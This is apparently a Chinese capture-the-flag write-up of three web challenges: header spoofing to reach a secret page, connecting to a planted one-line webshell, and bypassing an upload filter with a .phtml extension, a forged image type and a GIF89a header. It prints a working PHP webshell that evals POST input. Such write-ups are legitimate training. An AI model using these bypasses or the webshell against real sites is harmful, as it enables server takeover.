1,[极客大挑战 2019]Http
进入页面,查看页面源码,找到一个Secret.php页面就没有其他信息了,进去看看。
给了个提示,抓包看看。
提示我们的报文要来自于https://Sycsecret.buuoj.cn,那就插入请求源,得到第二个提示。
要我们使用“Syclover”浏览器访问,那么就修改一下报文。
得到第三个提示,要求只能本地访问,那么添加来源ip为127.0.0.1
得到flag
2,[极客大挑战 2019]Knife
进入页面,一个大大的一句话木马就在页面上。。。。真是白给的shell,蚁剑直接连。
配置几个基础信息,测试链接,成功。
在网站根目录下找到flag,拿到shell后这个站点基本可以随便搞了。
3,[极客大挑战 2019]Upload
进入页面,这次要自己上传木马,传个免杀马上去。
看来php后缀的还不行,抓包修改后缀,或者直接用图片马,但是要知道木马的位置,将php改为phtml,文件类型在报文中修改为image/jpeg,且向木马中添加一个图片头GIF89a,此时用一句话木马会被检测出<?,所以我们使用script来绕过'<?',具体木马源码如下:
GIF89a
<script language="php">@eval($_POST['pass']);</script>
上传通过,接下来就是寻找上传目录了,尝试看下有没有upload目录,发现有在其中找到上传的木马,如果不知道上传的马在哪,可以尝试下用目录扫描工具扫描一下。
上蚁剑连一下,链接成功。
在网站根目录下找到flag。